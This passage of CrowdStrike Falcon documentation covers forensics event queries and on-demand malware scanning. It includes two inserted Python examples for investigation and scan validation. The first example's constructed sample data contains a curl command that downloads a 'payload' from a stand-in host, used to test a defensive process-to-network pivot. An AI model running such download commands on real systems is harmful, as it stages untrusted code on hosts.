#event_simpleName=RawBindIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, RawProcessId, InContext, FfcNetworkState], limit=max)

RawBindIP6

Show all Fields

#event_simpleName=RawBindIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, RemoteAddressIP6, RemotePort, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, RawProcessId, InContext, FfcNetworkState], limit=max)

RouteIP4

Show all Fields

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

IPv4 remote connections

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* RemoteAddressIP4!="0.0.0.0" RemoteAddressIP4!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)
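The pivot described above (a ProcessRollup2 record of interest, then its Network* and RawBind* events keyed on the same host and process ID) and the "remote connections" filter can be checked offline against exported events. The following is an added example written for this page, not CrowdStrike code: the event and field names come from the queries above, the sample events are constructed, and the function names are this example's own. Note that the remote-connections filter is a conjunction: an event must have a remote address set and that address must not be the unspecified 0.0.0.0, otherwise every event passes.

```python
"""Offline version of the process-to-network pivot shown in the queries above.

Added example, not CrowdStrike code. Event and field names follow the page's
queries; the SAMPLE_EVENTS below are constructed, not real sensor output.
"""
from __future__ import annotations

from datetime import datetime, timezone

# Constructed sample events from one forensics collection. Timestamps are epoch
# seconds as strings, which is what parseTimeStamp(format=seconds) consumes.
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "aid": "aid-01",
     "ForensicsCollectionIdentifier": "coll-1", "ProcessStartTime": "1700000000",
     "RawProcessId": "4242", "ImageFileName": "/usr/bin/curl",
     "CommandLine": "curl -o /tmp/payload http://example.invalid/payload", "UID": "1000"},
    {"event_simpleName": "NetworkConnectIP4", "aid": "aid-01",
     "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": "1700000005",
     "ContextProcessId": "4242", "RemoteAddressIP4": "203.0.113.10", "RemotePort": "80",
     "LocalAddressIP4": "10.0.0.5", "LocalPort": "51234", "Protocol": "6"},
    # Same process, but no remote peer recorded (unspecified address).
    {"event_simpleName": "NetworkConnectIP4", "aid": "aid-01",
     "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": "1700000006",
     "ContextProcessId": "4242", "RemoteAddressIP4": "0.0.0.0", "RemotePort": "0",
     "LocalAddressIP4": "10.0.0.5", "LocalPort": "51235", "Protocol": "6"},
    # RawBind* events carry the pid in RawProcessId rather than ContextProcessId.
    {"event_simpleName": "RawBindIP4", "aid": "aid-01",
     "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": "1700000007",
     "RawProcessId": "4242", "RemoteAddressIP4": "", "RemotePort": "",
     "LocalAddressIP4": "0.0.0.0", "LocalPort": "8080", "Protocol": "6"},
    # Same pid on a different host: must not be attributed to the process above.
    {"event_simpleName": "NetworkConnectIP4", "aid": "aid-02",
     "ForensicsCollectionIdentifier": "coll-1", "ContextTimeStamp": "1700000008",
     "ContextProcessId": "4242", "RemoteAddressIP4": "198.51.100.7", "RemotePort": "443",
     "LocalAddressIP4": "10.0.0.9", "LocalPort": "40000", "Protocol": "6"},
]


def format_time(epoch_seconds: str | int) -> str:
    """Equivalent of parseTimeStamp(format=seconds) | formatTime("%F %T")."""
    return datetime.fromtimestamp(int(epoch_seconds), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def is_remote_connection(event: dict) -> bool:
    """The 'IPv4 remote connections' filter: the remote address must be present
    AND must not be the unspecified address. Both clauses are required."""
    addr = event.get("RemoteAddressIP4", "")
    return addr != "" and addr != "0.0.0.0"


def processes_matching(events: list[dict], command_line_contains: str) -> list[dict]:
    """ProcessRollup2 events whose CommandLine contains the string of interest."""
    return [e for e in events
            if e.get("event_simpleName") == "ProcessRollup2"
            and command_line_contains in e.get("CommandLine", "")]


def network_activity(events: list[dict], aid: str, raw_pid: str, collection: str) -> list[dict]:
    """Join Network* and RawBind* events to one process. The join key is the host
    (aid), the collection and the pid, which Network* events expose as
    ContextProcessId and RawBind* events as RawProcessId."""
    rows = []
    for e in events:
        name = e.get("event_simpleName", "")
        if name.startswith("Network"):
            pid = e.get("ContextProcessId")
        elif name.startswith("RawBind"):
            pid = e.get("RawProcessId")
        else:
            continue
        if (e.get("aid"), e.get("ForensicsCollectionIdentifier"), pid) != (aid, collection, raw_pid):
            continue
        rows.append({
            "time": format_time(e["ContextTimeStamp"]),
            "event": name,
            "local": f'{e.get("LocalAddressIP4", "")}:{e.get("LocalPort", "")}',
            "remote": f'{e.get("RemoteAddressIP4", "")}:{e.get("RemotePort", "")}',
            "is_remote": is_remote_connection(e),
        })
    return rows


def pivot(events: list[dict], command_line_contains: str) -> dict:
    """Full chain: process of interest -> its network and bind activity, keyed by (aid, pid)."""
    result = {}
    for proc in processes_matching(events, command_line_contains):
        key = (proc["aid"], proc["RawProcessId"])
        result[key] = {
            "started": format_time(proc["ProcessStartTime"]),
            "image": proc["ImageFileName"],
            "activity": network_activity(events, proc["aid"], proc["RawProcessId"],
                                         proc["ForensicsCollectionIdentifier"]),
        }
    return result


if __name__ == "__main__":
    for (aid, pid), info in pivot(SAMPLE_EVENTS, "payload").items():
        print(f"{info['started']} {aid} pid={pid} {info['image']}")
        for row in info["activity"]:
            kind = "remote" if row["is_remote"] else "local/unspecified"
            print(f"  {row['time']} {row['event']:<18} {row['local']} -> {row['remote']} ({kind})")
```

Run as a script it prints the process and its three attributed events; the fifth sample event, which shares the pid but not the host, is correctly left out, which is why the pivot must key on aid and collection as well as on the process ID.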

RouteIP6

Show all Fields

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

IPv6 remote connections

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* RemoteAddressIP6!="0.0.0.0" RemoteAddressIP6!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

UserAccount

Show all Fields

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([time, aid, ForensicsCollectionIdentifier, UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show all fields for UserAccountDeleted

#event_simpleName=UserAccountDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, UID, UserRealName], limit=max)

Show all Users

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([UID, UserName, UserRealName, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show users in root group

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* GID=0 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show users with admin level privileges

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* UserIsAdmin=1 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

YARA

Show all fields for FfcBytePatternScanResult

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcScanId, FfcScanType, FfcScanResult, FfcScanRuleName, ImageFileName, TargetFileName, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

On-Demand Scanning

On-Demand Scanning

Create on-demand scans that detect and quarantine PE files that contain dormant malware.

On-Demand Scanning

CrowdStrike Falcon on-demand scanning can detect and quarantine portable executable (PE) files, such as .exe and .dll files, that contain dormant malware before they execute on Windows hosts. Run scans either immediately or according to a schedule that you specify.

Requirements

  • Subscription: Falcon Prevent

  • Sensor support: Falcon sensor for Windows 6.48 and later

    • Note: Glob syntax in scan file paths is supported in Falcon sensor for Windows 6.51 and later

  • Host system requirements: Any host running a Falcon-supported version of Windows, including virtual hosts

  • Roles:

    • Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst can create and run scans from the Falcon console

    • Falcon Analyst - Read Only can view scan results in the Falcon console

    • End users can run scans and view scan results on the local host if enabled by policy

  • CrowdStrike clouds: Available in all clouds

Before you begin

Before you create individual on-demand scans, configure prevention policy settings for on-demand scans. Settings at the prevention policy level control behavior for scans that are initiated by end users on a local host and for scans that are triggered by USB device insertion on a local host. For more info, see On-Demand Scans category.

Understanding on-demand scanning

When an on-demand scan is initiated on a Windows host, the file paths that you specified are scanned for malicious PE files. Depending on your settings, malicious files can be quarantined.

For Windows sensors earlier than 6.51, scans must be defined with absolute paths. Subfolders are automatically included in these scans.

For Windows sensors 6.51 and later, scans can be defined with either glob expressions or absolute paths. If you want all subfolders to be included in these scans, you must end the absolute file path with the glob wildcard **.

Falcon users can manage scans and view scan results through the Falcon console and through the CrowdStrike API.

End users can run scans and view scan results on their local hosts through a right-click menu.

A command-line interface (CLI) can optionally be invoked on the local host to initiate scans and view scan results. For more info, see On-demand scanning CLI.

Depending on how you configure your prevention policies and scan-specific settings, scans can be initiated in these ways:

  • Falcon console: Based on a configuration or an action in the Falcon console, a scan is initiated on the host, either immediately or according to a specified schedule.

  • CrowdStrike API: Based on a configuration in the CrowdStrike API, a scan is initiated on the host, either immediately or according to a specified schedule.

  • USB insertion: When a USB storage device is inserted, a scan of the USB device is initiated immediately on the host.

  • End user: On a local host, through the right-click menu, an end user initiates a scan that runs immediately on that host.

  • CLI: A scan is initiated on a local host through the CLI.

File quarantining

For scans that are initiated through the Falcon console or the CrowdStrike API, quarantine actions are determined by your configuration settings for each individual scan. For more info, see Create a scan.

For scans that are initiated by an end user or triggered by a USB device insertion, quarantine actions are determined by prevention policy settings. To disable file quarantining, set the Prevention slider to Disabled. For more info, see On-Demand Scans Machine Learning.

Files that were quarantined from a USB device and then subsequently released by a Falcon administrator are added to C:\ProgramData\CrowdStrike on the local host.

Immediate versus scheduled scans

When you create a scan, you specify whether you want the scan to run immediately or at a scheduled time.

A scheduled scan can run once or on a recurring interval that you specify. A scheduled scan runs within 15 minutes of the specified start time in each host’s local time zone. To help prevent network load issues when multiple hosts are scheduled to be scanned at the same time, the actual scan start times are staggered. For example, if you scheduled a scan with a start time of 9:00 AM, the scans of individual hosts in the specified group would start sometime between 8:45 AM and 9:15 AM.

Note: Scheduled scans can only be set for a future date and time. When scheduling a scan, consider the host's time zone. If a host is in a time zone ahead of your time zone, the sensor may ignore the scan if it appears to be scheduled for a time that has already passed in the host's local time zone.

When you create a scan, you can specify a maximum duration. A running scan automatically stops if the specified limit is reached, and the scan is labeled as Incomplete in the scan log.

Immediate scans can be configured for individual hosts or host groups. Scheduled scans can be configured for only host groups.

Performance and CPU utilization

On-demand scanning can result in increased CPU usage, especially while scanning large volumes. CPU resource limits are implemented by controlling the number of worker threads that are used by the scan. The number of worker threads is based on how many CPU cores are available on the local host, allowing Falcon to approximate the overall CPU utilization.

When you create a scan, you specify a performance setting that determines how much of the local CPU’s resources can be used for that scan. To mitigate the risk of performance impact, we recommend setting a lower initial performance threshold. Before wide-scale deployment, we recommend testing performance impact on a sample population of hosts and adjusting CPU utilization settings based on your environment. You can increase the threshold as needed after you’ve observed its effects in your environment. For more information, see our knowledge article, CPU Utilization on Windows Hosts Running On-Demand Scanning (ODS) is higher than expected.

Any files that were previously scanned and haven’t been modified are skipped during the scanning process.

End-user notifications

For each on-demand scan that you create, you can optionally enable notifications that appear on the local host during and after the scanning process.

For scans that end users launch through the right-click menu on the local host, end user notifications are always enabled.

For scans that are triggered by a USB device insertion, end user notifications are determined by the Notify End Users setting in the Sensor Capabilities section of the prevention policy.

The duration of end user notification pop-ups is controlled by local Windows system settings that are outside the control of Falcon.

Custom IOCs and exclusions

Any hash-based IOCs on your allowlist and blocklist take precedence during the scanning process. If a Microsoft-signed Windows binary is added to your blocklist as a hash-based IOC, the IOC match is detected but the file is not quarantined during scanning.

Sensor visibility exclusions are respected during the scanning process.

When you create a scan through the Falcon console or API, you can explicitly exclude specific file paths from scans. During the scanning process, the sensor skips those excluded folders. These exclusions are unique to the on-demand scanning function and aren’t used in any other capacity.

On-demand scan event search

For advanced investigation of malicious files found during scanning, use the search that corresponds to your environment.

Search events using Investigate > Search > Advanced event search with this query:

#event_simpleName=OdsMaliciousFileFound

For more info, see "OdsMaliciousFileFound" in Events Full Reference (Events Data Dictionary).

Limitations and considerations

For Windows sensors earlier than 6.51, scans must be defined with absolute paths. Subfolders are automatically included in these scans.

For Windows sensors 6.51 and later, scans can be defined with either glob expressions or absolute paths.

To facilitate faster scanning, we recommend entering a specific file path when possible. The broader the search criteria, the longer the scanning process will take. For example, file paths starting with ** might take a long time to scan because every drive and subfolder must be traversed when searching for a match.

For more info about scan timing considerations, see Immediate versus scheduled scans.

Considerations for configuring file paths to include in a scan:

  • Falcon automatically appends a slash (/) to the end of the path.

  • You can optionally specify a drive letter.

  • You cannot start the file path with a square-bracket glob syntax prefix. Examples:

    • Supported: C:\folder1\subfolder[1-5]\*

    • Supported: **\folder1\*

    • Not supported: [a-z]:\folder1\*

  • If you want all files in the specified folder to be scanned, add * to the end of the path. Example:

    • C:\folder1\*

  • Scan subfolders to search for files within a folder structure. Examples:

    • C:\folder1\

    • C:\folder1\**

When specifying a file path to scan or exclude from a scan, Windows path variables, such as %ProgramFiles% and %SystemRoot%, are not supported. Additionally, symbolic links (symlinks) are not supported.

When specifying a file path to exclude from a scan, you can specify glob syntax to more narrowly target the scan. However, glob syntax is not supported when specifying a file path to include in a scan.

Only PE files, such as .exe and .dll files, can be scanned. Archive and data file types, such as .zip and .pst files, are not scanned. The maximum supported file size for PE files is 60 MB.

Only files located on storage that’s considered local to the host are scanned. Examples of scannable drives include internal hard drives, USB devices, and SAN drives. Non-local drives—such as network drives, mapped network shares, and cloud storage drives—are skipped during scanning.

In scan results, unscanned files are represented as Unsupported files.

Because not all file types are scanned, the reported number of files scanned might differ from the total file count. The Malicious files found count includes only PE files.

If a given host is reprovisioned, the Host Management list might contain multiple entries with the same host name. However, only the most recent instance of the host can be scanned. Attempts to scan older instances of a host fail. If the Host Management list contains multiple entries for the same host name, confirm that you’re selecting the most recent instance of that host for scanning. Alternatively, you can start a scan from a host group instead of from an individual host.

Tip: As a best practice, we recommend that you delete all older, duplicate host instances from the Host Management list. For more info about deleting host entries, see Managing inactive and duplicate hosts.

End-user actions

If enabled by policy, end users can perform these actions through the right-click menu on a local host:

  • Run a scan on a selected file or folder, the full system drive, or all local drives on the host.

  • View scan status and results.

  • Cancel, pause, or resume scans that they initiated.

  • Pause or resume scans that were initiated by other methods.

For detailed info about how end users initiate and manage scans on the local host, see the Windows On-Demand Scanning End User Guide.

Setup

Configuring on-demand scanning is a two-part process:

  1. Configure prevention policy settings:

    1. Configure On-Demand Scans Machine Learning and On-Demand Scans category settings as needed. These settings control behavior for scans that are initiated by end users on the local host and for scans that are triggered by USB device insertion on the local host. For more info, see On-Demand Scans category.

    2. To enable file quarantining upon scanning of USB storage devices, enable Quarantine on Removable Media in the Quarantine category. For more info, see Quarantine on Removable Media.

  2. Configure settings for individual on-demand scans. For more info, see On-demand scan management.

Consider sharing this information with your end users:

  • Why CrowdStrike Falcon malware scanning is installed on their computers

  • How on-demand scanning works

  • Why and when end users might want to run their own scans

  • Why and when they might see scanning activity that they didn’t initiate

  • What follow-up actions you want them to take if malicious files are found

  • Where they can retrieve quarantined files that you’ve released

You can also share a PDF version of the Windows On-Demand Scanning End User Guide with your end users.

On-demand scan management

Get to on-demand scans

The On-demand scans page is where you can view, create, and manage your on-demand scans. From this page, you can also view and export on-demand scan logs.

Create a scan

  1. On the On-demand scans page, click Create a scan.

  2. Specify when to run the scan:

    • Now: Run the scan immediately.

      • Optional. Specify how much time can elapse before the scan automatically stops.

    • In the future: Run the scan at a specified time in the future.

      1. Specify a start date and time that’s in the future for all affected hosts.

        Note: When specifying the time, consider the host's time zone. If a host is in a time zone ahead of your time zone, the sensor may ignore the scan if it appears to be scheduled for a time that has already passed in the host's local time zone.

      2. Optional. Specify how much time can elapse before each occurrence of the scan automatically stops.

      3. Specify a recurrence interval for the scan. If you want the scan to run only once, select Never.

  3. Select the hosts or host groups to scan.

  4. Specify file paths and exclusions. These fields support glob syntax; for more info, see Glob Syntax and Limitations and considerations.

    1. Specify one or more absolute file paths to scan, or upload a plain-text file that contains 1,024 or fewer characters. Specify one path per line.

    2. Optional. Specify paths to exclude from scans, or upload a plain-text file that contains 1,024 or fewer characters. Specify one path per line.

  5. Optional. Add a descriptive comment about the scan.

  6. Configure Sensor Anti-malware settings for this scan:

    • Detection level: Specify a sensor detection level for the scan.

    • Prevention level: Specify a sensor prevention level for quarantining files during the scan. For more info, see File quarantining.

  7. Configure Cloud Anti-malware settings for this scan:

    • Detection level: Specify a cloud detection level for the scan.

    • Prevention level: Specify a cloud prevention level for quarantining files during the scan. For more info, see File quarantining.

  8. Performance: Specify a maximum CPU utilization limit for this scan. For more info, see Performance and CPU utilization.

  9. Configure End-user settings:

    1. Optional. To show scan status notifications to end users on the local host, select the Show notifications to end user checkbox.

    2. Pause duration: Specify how long user-initiated scans can remain paused by end users. After the specified time period has elapsed, the scan automatically resumes. To allow an unlimited duration, enter 0.

  10. Click Create scan.

After you create a scan, it appears on either the Scan log page or the Scheduled scans page, where you can view its status. When a scheduled scan starts running, the running scan appears on the Scan log page. If a scheduled scan has a recurrence, the next recurring scheduled scan appears on the Scheduled scans page.
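Most scan definitions that fail or underperform do so for reasons this page already spells out: a path that starts with a square-bracket glob prefix, a path variable such as %ProgramFiles%, a leading ** that walks every drive, an uploaded path file over 1,024 characters, or a start time that is already in the past for hosts in a time zone ahead of the administrator's. The following is an added pre-flight check written for this page, not CrowdStrike code: it encodes those rules (for sensor 6.51 and later glob semantics) over a scan definition whose keys follow the exported-file field names, and the host-to-time-zone map, the sample definition and the fixed "now" are constructed for the example.

```python
"""Pre-flight checks for an on-demand scan definition before it is created
through the Falcon console or the API.

Added example, not CrowdStrike code. It encodes the rules stated on this page
for sensors 6.51 and later: path syntax, the 1,024-character limit for an
uploaded path file, cpu_priority 1 to 5, 0 meaning unlimited for max_duration
and pause_duration, the 15-minute stagger window, and hosts ignoring a start
time that is already past in their local zone. HOST_ZONES (host id -> tzinfo)
and SAMPLE_DEFINITION are constructed for this example.
"""
from __future__ import annotations

import re
from datetime import datetime, timedelta, timezone

MAX_PATH_FILE_CHARS = 1024
STAGGER = timedelta(minutes=15)
ENV_VAR = re.compile(r"%[^%\\]+%")            # %ProgramFiles%, %SystemRoot%, ...
ABSOLUTE = re.compile(r"^(?:[A-Za-z]:)?\\")   # drive letter optional, backslash-rooted


def check_path(path: str) -> tuple[list[str], list[str]]:
    """Return (errors, warnings) for one include or exclude path."""
    errors, warnings = [], []
    if path.startswith("["):
        errors.append("a path cannot start with a square-bracket glob prefix")
    elif not (ABSOLUTE.match(path) or path.startswith("**")):
        errors.append("path must be absolute (drive letter optional)")
    if ENV_VAR.search(path):
        errors.append("Windows path variables such as %ProgramFiles% are not supported")
    if path.startswith("**"):
        warnings.append("leading ** traverses every drive and subfolder; expect a long scan")
    if path.endswith("\\"):
        warnings.append("no trailing wildcard: add * to scan the folder's files, ** to include subfolders")
    return errors, warnings


def check_path_file(text: str) -> list[str]:
    """Validate an uploaded plain-text path list: one path per line, 1,024 characters or fewer."""
    problems = []
    if len(text) > MAX_PATH_FILE_CHARS:
        problems.append(f"path file is {len(text)} characters; the limit is {MAX_PATH_FILE_CHARS}")
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.strip():
            problems += [f"line {line_no}: {e}" for e in check_path(line.strip())[0]]
    return problems


def stagger_window(local_start: datetime) -> tuple[datetime, datetime]:
    """Hosts start within 15 minutes either side of the scheduled local time."""
    return local_start - STAGGER, local_start + STAGGER


def hosts_that_would_skip(start_wall_clock: datetime, host_zones: dict, now: datetime) -> list[str]:
    """The date and time typed into the form is applied in each host's local zone;
    a host whose local start is already in the past may ignore the scan."""
    if start_wall_clock.tzinfo is not None:
        raise ValueError("pass the wall-clock time without a tzinfo")
    return sorted(host for host, zone in host_zones.items()
                  if start_wall_clock.replace(tzinfo=zone) <= now)


def preflight(definition: dict, host_zones: dict, now: datetime) -> dict:
    """Check a whole scan definition; returns {'errors': [...], 'warnings': [...]}."""
    report = {"errors": [], "warnings": []}
    if not definition.get("file_paths"):
        report["errors"].append("file_paths: at least one path to scan is required")
    for field in ("file_paths", "scan_exclusions"):
        for path in definition.get(field, []):
            errors, warnings = check_path(path)
            report["errors"] += [f"{field} {path!r}: {e}" for e in errors]
            report["warnings"] += [f"{field} {path!r}: {w}" for w in warnings]
    if definition.get("cpu_priority") not in (1, 2, 3, 4, 5):
        report["errors"].append("cpu_priority must be 1 (lowest) to 5 (highest)")
    for field in ("max_duration", "pause_duration"):
        if definition.get(field, 0) == 0:
            report["warnings"].append(f"{field} is 0, which means unlimited")
    start = definition.get("schedule.start_timestamp")
    if start is not None:
        for host in hosts_that_would_skip(start, host_zones, now):
            report["errors"].append(f"schedule.start_timestamp: already past in {host}'s local zone")
    return report


# Constructed sample. Fixed UTC offsets stand in for zoneinfo names so the example
# runs without a tz database; use zoneinfo.ZoneInfo for real hosts.
NOW = datetime(2026, 4, 15, 9, 30, tzinfo=timezone.utc)
HOST_ZONES = {
    "host-nyc": timezone(timedelta(hours=-4)),
    "host-tokyo": timezone(timedelta(hours=9)),
    "host-berlin": timezone(timedelta(hours=2)),
}
SAMPLE_DEFINITION = {
    "description": "Weekly sweep of user profiles",
    "file_paths": ["C:\\Users\\**", "**\\Downloads\\*"],
    "scan_exclusions": ["[a-z]:\\Temp\\*"],
    "cpu_priority": 2,
    "max_duration": 0,
    "pause_duration": 30,
    "schedule.start_timestamp": datetime(2026, 4, 15, 10, 0),
}

if __name__ == "__main__":
    for level, items in preflight(SAMPLE_DEFINITION, HOST_ZONES, NOW).items():
        for item in items:
            print(f"{level[:-1].upper()}: {item}")
```

Against the sample definition the check reports three errors (the bracket-prefixed exclusion, and a 10:00 start that has already passed at 09:30 UTC for the hosts at UTC+2 and UTC+9) and two warnings (the leading ** include path and the unlimited max_duration); the New York host is fine because its 10:00 local is still in the future.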

Duplicate an on-demand scan

Create a scan by duplicating an existing scan and then modifying the new scan’s settings.

  1. On the On-demand scans page, go to the Scan log or Scheduled scans tab.

  2. Click the scan that you want to duplicate and then, from the Actions menu, select Duplicate scan. The fields in the new duplicated scan are prepopulated with values from the source scan.

  3. Modify settings as described in Create a scan.

  4. Click Create scan.

View on-demand scan logs

View status info about past scans and currently running scans.

A Quarantined designation indicates that the file was quarantined from a USB device during scanning. However, the file might have subsequently been released by a Falcon administrator.

Note: Because not all file types are scanned, the reported number of files scanned might differ from the total file count. The Malicious files found count includes only PE files.

For more info about scan status values, see On-demand scan status values.

Scan log entries are retained for 90 days.

  1. On the On-demand scans page, go to the Scan log tab.

  2. Adjust your view by filtering or sorting the log entries.

  3. Click any log entry to see more details.

View scheduled scans

View info about your scheduled scans.

For info about scan status values, see On-demand scan status values.

  1. On the On-demand scans page, go to the Scheduled scans tab.

  2. Adjust your view by filtering or sorting the log entries.

  3. Click any log entry to see more details.

Export on-demand scan logs or scheduled scan info

Export one or more on-demand scan logs in CSV or JSON format. You can also export information about your scheduled scans.

For info about the contents of exported files, see Exported file fields.

  1. On the On-demand scans page, go to the Scan log or Scheduled scans tab.

  2. Adjust your view by filtering or sorting the entries.

  3. Select the checkboxes for the relevant scans, click Export, and then click either CSV or JSON. Falcon prepares the file for download.

    Note: The file preparation process can take up to 15 minutes to complete.

  4. Click Download.

Note: You can also export logs for a specific scan from its scan details page. When you export these scan logs, any associated detections are also included in the exported file.

Cancel a running scan

Cancel one or more scans that are in progress. If you cancel a scan, its status changes to Canceled and any partial results are available for viewing in scan logs. If the scan was initiated according to a recurring schedule, all future instances of the scan will continue to run as scheduled.

Note: Scans initiated by end users can be canceled only through the right-click menu on the local host.

  1. On the On-demand scans page, go to the Scan log tab.

  2. Adjust your view by filtering or sorting the log entries.

  3. Select the checkboxes for the scans that you want to cancel, and then click Cancel scans.

Delete a scheduled scan

If you delete a scheduled scan, no future instances of that scan will run. However, the results from any past runs remain available in the scan log. For more info, see View on-demand scan logs.

  1. On the On-demand scans page, go to the Scheduled scans tab.

  2. Adjust your view by filtering or sorting the log entries.

  3. Select the checkboxes for the scheduled scans that you want to delete, and then click Delete scans.

On-demand scan status values

This table describes the possible status values for on-demand scans.

For info about viewing on-demand scan logs, see View on-demand scan logs.

  • Running: The scan is currently running.

  • Scheduled: The scan is scheduled to start running at the specified date and time. A scheduled scan runs at the specified time in each host’s local time zone.

  • Pending: The host is currently running another scan. The scan will begin when host resources become available.

  • Complete: The scan has finished running.

  • Incomplete: The scan started running, but did not complete.

  • Paused: The scan is currently paused.

  • Canceled: The scan was canceled.

  • Failed: The scan failed before it could complete. A failed scan can be caused by these conditions:

    • The host isn’t responding

    • The specified file path can’t be accessed

    • The scan was scheduled to run in the past for the host’s local time zone

Exported file fields

For info about exporting on-demand scan logs or scheduled scan details in CSV or JSON format, see Export on-demand scan logs or scheduled scan info.

For more info about configurable scan settings and their possible values, see Create a scan.

Field Description Scan types Export-file types

id

The unique identifier for the scan object

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

cid

The CID that the scan was created on

  • Immediate scans

  • Scheduled scans

  • JSON

profile_id

The unique identifier for the scan configuration

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

description

The user-configured scan description

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

file_paths

The absolute file paths to scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

scan_exclusions

The file paths to exclude from scanning

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

scan_inclusions

The file paths to scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

initiated_from

How the scan was triggered. Possible values:

  • falcon_adhoc: Scan initiated by a Falcon user

  • cloud_adhoc: Scan initiated by CrowdStrike API

  • cloud_scheduled: Scan initiated according to a configured schedule

  • endpoint_user: Scan initiated by an end user on a local host

  • auto_usb: Scan triggered by USB storage device inserted on a host

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

quarantine

Indicates whether file quarantining is enabled or disabled for the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

cpu_priority

The level of host CPU utilization configured for the scan. Possible values:

  • 1: Lowest

  • 2: Low

  • 3: Medium

  • 4: High

  • 5: Highest

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

preemption_priority

Indicates the priority of the scan compared to other scans running on the host. Values are determined by scan type:

  • 1: Cloud ad hoc (highest priority)

  • 5: USB device insertion

  • 10: Endpoint user

  • 15: Scheduled (lowest priority)

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

metadata.host_id

The unique identifier for the host running the scan

  • Immediate scans

  • Scheduled scans

  • JSON

  • CSV

metadata.host_scan_id

The unique identifier given by sensor for the scan running on the host

  • Immediate scans

  • JSON

  • CSV

metadata.scan_host_metadata_id

The unique identifier for a single host’s scan

  • Immediate scans

  • JSON

metadata.filecount.scanned

The number of files scanned. For more info, see Limitations and considerations.

  • Immediate scans

